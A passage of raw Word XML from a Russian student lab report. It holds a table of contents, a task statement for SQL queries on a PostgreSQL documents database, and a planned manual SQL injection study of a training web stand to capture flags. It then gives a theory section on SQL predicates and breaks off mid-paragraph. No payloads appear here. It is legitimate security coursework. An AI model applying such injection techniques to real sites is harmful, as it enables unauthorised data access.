            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005061" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
                <w:noProof/>
              </w:rPr>
              <w:t>В чем заключается техника двойной слепой (double-blind) SQLi?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005061 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1031919B" w14:textId="5F8C6B63" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:b w:val="0"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005062" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
              </w:rPr>
              <w:t>Выводы</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005062 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="58AB935E" w14:textId="0E6797A8" w:rsidR="00E11E5A" w:rsidRDefault="00E11E5A">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
              <w:b w:val="0"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229005063" w:history="1">
            <w:r w:rsidRPr="002C1BEA">
              <w:rPr>
                <w:rStyle w:val="aff2"/>
              </w:rPr>
              <w:t>Список используемых источников</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229005063 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="292A73AC" w14:textId="49414F7F"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29005034"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Формулировка задания</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="6BAA52B1" w14:textId="09868CC0" w:rsidR="00FB440B" w:rsidRPr="00FB440B" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">В первой части лабораторной работы требовалось составить и выполнить SQL-запросы к отношениям, разработанным по варианту № 8. Предметная область включает документы организации и журнал операций с ними. Отношение </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>documents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> хранит сведения о документах, включая номер, тип, ответственного сотрудника, содержание, подразделение, даты действия и степень секретности. Отношение </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>document_operations</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> хранит сведения об операциях, выполненных сотрудниками над документами.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391DE9BB" w14:textId="6E8A93EA" w:rsidR="00FB440B" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Для выполнения первой части использовалась отдельная база данных subd_lab3, развернутая в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 16 в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">-контейнере. В базе были созданы таблицы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>documents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>document_operations</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, после чего они были заполнены тестовыми обезличенными данными. Для обеспечения </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>проверяемости</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> результатов дополнительно были добавлены документы DOC-009 и DOC-010, а также операции по документу DOC-009. Это позволило получить непустые результаты для всех запросов лабораторной работы и проверить корректность условий выборки.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Для первой части использовался вариант № 8 из ранее выполненной работы по организации данных и разграничению доступа. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9C8CF0" w14:textId="77777777" w:rsidR="00FB440B" w:rsidRPr="00B8085B" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r w:rsidRPr="00E9167C">
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E9167C">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>Вариант задания №8</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4773"/>
        <w:gridCol w:w="5139"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FB440B" w14:paraId="36A6A992" w14:textId="77777777" w:rsidTr="00603F8B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FD7C381" w14:textId="77777777" w:rsidR="00FB440B" w:rsidRPr="00E56B7C" w:rsidRDefault="00FB440B" w:rsidP="00603F8B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E56B7C">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Описание данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2374106B" w14:textId="77777777" w:rsidR="00FB440B" w:rsidRPr="00E56B7C" w:rsidRDefault="00FB440B" w:rsidP="00603F8B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E56B7C">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Описание прав доступа</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB440B" w14:paraId="696CCC44" w14:textId="77777777" w:rsidTr="00603F8B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32C41191" w14:textId="77777777" w:rsidR="00FB440B" w:rsidRPr="00E56B7C" w:rsidRDefault="00FB440B" w:rsidP="00603F8B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E56B7C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Отношение 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26E2C51D" w14:textId="77777777" w:rsidR="00FB440B" w:rsidRPr="00B8085B" w:rsidRDefault="00FB440B" w:rsidP="00603F8B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r>
              <w:t>Тип документа (AK), Номер документа (PK), ФИО ответственного (AK), Содержание документа (JSON), Внутреннее подразделение (AK), Дата ввода в действие (AK), Дата окончания действия если есть, Степень секретности если есть.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64B0B06A" w14:textId="77777777" w:rsidR="00FB440B" w:rsidRPr="009D6DEB" w:rsidRDefault="00FB440B" w:rsidP="00603F8B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r>
              <w:t>Сотрудник видит все несекретные документы (отношение 1), но не операции с ними (отношение 2). Сотрудник видит все секретные документы, в которых он назначен ответственным. Сотрудник может изменять срок действия документов, в которых он назначен ответственным.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB440B" w14:paraId="02AB358E" w14:textId="77777777" w:rsidTr="00603F8B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DE52CEA" w14:textId="77777777" w:rsidR="00FB440B" w:rsidRPr="00E56B7C" w:rsidRDefault="00FB440B" w:rsidP="00603F8B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E56B7C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Отношение 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BF8C92D" w14:textId="77777777" w:rsidR="00FB440B" w:rsidRPr="00B8085B" w:rsidRDefault="00FB440B" w:rsidP="00603F8B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r>
              <w:t>ФИО сотрудника (PK), Номер документа (PK, FK), Дата изменения (PK), Операция с документом.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="024A97B9" w14:textId="77777777" w:rsidR="00FB440B" w:rsidRPr="009D6DEB" w:rsidRDefault="00FB440B" w:rsidP="00603F8B">
            <w:pPr>
              <w:pStyle w:val="ad"/>
            </w:pPr>
            <w:r w:rsidRPr="00E5536B">
              <w:t>Сотрудник видит все операции с документами, которые выполнил он или, если они выполнены в отношении документов, за которые он ответственен. Сотрудник может изменять поле «операция с документом» в отношении 2 для своих записей.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4690F111" w14:textId="77777777" w:rsidR="00FB440B" w:rsidRPr="00FB440B" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="417CE874" w14:textId="77777777" w:rsidR="00FB440B" w:rsidRPr="00FB440B" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Первая часть работы включала реализацию трех запросов. Первый запрос должен был найти сотрудников, которые отвечают более чем за один секретный документ заданной степени секретности. Второй запрос должен был выбрать документы, срок окончания действия которых не входит в заданный перечень месяцев. Третий запрос должен был определить сотрудников, которые либо выполнили по какому-либо документу все операции из заданного перечня, либо являются ответственными за документы, по которым они сами не выполняли операций.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B4E39A" w14:textId="77777777" w:rsidR="00FB440B" w:rsidRPr="00FB440B" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Во второй части лабораторной работы требовалось выполнить практическое исследование SQL-инъекций на индивидуальном учебном </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">-стенде. Для работы был создан стенд </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Cheerful</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>-Island с UUID 281597ea-a798-410d-9e81-43bb6b4ce978. Тип сайта — магазин одежды. Целью второй части было найти три индивидуальных флага формата ibks1_{...}, ibks2_{...}, ibks3_{...}, получить данные о сервере СУБД, выявить уязвимые параметры и описать меры защиты от обнаруженных SQL-инъекций.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8EA2CD" w14:textId="5559682D" w:rsidR="00572DB0" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Эксплуатация стенда выполнялась вручную с использованием </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Suite Community и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Repeater</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Автоматизированные сканеры, массовый перебор, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Intruder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> и активное сканирование не использовались. Такой подход позволил контролировать количество запросов к стенду и исключить избыточную нагрузку на учебный портал.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D03E3F" w14:textId="77777777" w:rsidR="009D3CCE" w:rsidRPr="00572DB0" w:rsidRDefault="009D3CCE" w:rsidP="00572DB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00572DB0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F0E926" w14:textId="77777777" w:rsidR="00903505" w:rsidRDefault="00903505" w:rsidP="00903505">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc229005035"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Теоретические сведения</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="66428276" w14:textId="7A436CC7" w:rsidR="000C2407" w:rsidRPr="000C2407" w:rsidRDefault="00572DB0" w:rsidP="00730657">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc229005036"/>
      <w:r>
        <w:t>Манипулирование данными и особенности SQL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="0C9E9403" w14:textId="77777777" w:rsidR="00FB440B" w:rsidRPr="00FB440B" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Язык SQL используется не только для простого извлечения строк из таблиц, но и для выражения сложных условий, группировок, проверок существования связанных строк и операций над множествами. В лабораторной работе это проявляется в первой части: для получения требуемых результатов недостаточно простого SELECT * FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>; необходимо использовать фильтрацию, группировку, агрегатные функции, вложенные запросы и проверку выполнения набора условий.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FA9DDE" w14:textId="77777777" w:rsidR="00FB440B" w:rsidRPr="00FB440B" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Одна из важных особенностей SQL — отличие декларативного запроса от процедурного алгоритма. Пользователь описывает, какие данные необходимо получить, а конкретный способ выполнения выбирает оптимизатор СУБД. Например, при поиске сотрудников, ответственных более чем за один секретный документ, в запросе указывается группировка по ответственному сотруднику и условие HAVING </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>COUNT(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">*) &gt; 1, но порядок чтения строк и способ агрегации выбирает </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4850801A" w14:textId="77777777" w:rsidR="00FB440B" w:rsidRPr="00FB440B" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Для анализа связанных данных часто используются подзапросы и предикат EXISTS. Он позволяет проверять наличие хотя бы одной строки, удовлетворяющей условию. В задачах, близких к операции деления реляционной алгебры, удобно использовать двойной NOT EXISTS: внешний запрос выбирает объект-кандидат, а вложенные запросы проверяют, что не существует обязательного элемента, который не был бы связан с этим объектом. Такой прием применяется, когда нужно установить, что сотрудник выполнил весь заданный набор операций.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1850A5E9" w14:textId="5BBAADDF" w:rsidR="000C2407" w:rsidRPr="000C2407" w:rsidRDefault="00FB440B" w:rsidP="00FB440B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Также важны агрегатные функции и группировка. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>COUNT(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FB440B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>*) используется для подсчета строк, COUNT(DISTINCT ...) — для подсчета различных значений, а HAVING позволяет фильтровать уже сгруппированные результаты. В отличие от WHERE, который применяется к отдельным строкам до группировки, HAVING применяется к результатам группировки. Поэтому условия вида “более одного документа” или “все операции из перечня” обычно выражаются именно через агрегаты и HAVING.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F98F6B" w14:textId="77777777" w:rsidR="000C2407" w:rsidRPr="000C2407" w:rsidRDefault="000C2407" w:rsidP="000C2407">
      <w:pPr>
        <w:rPr>
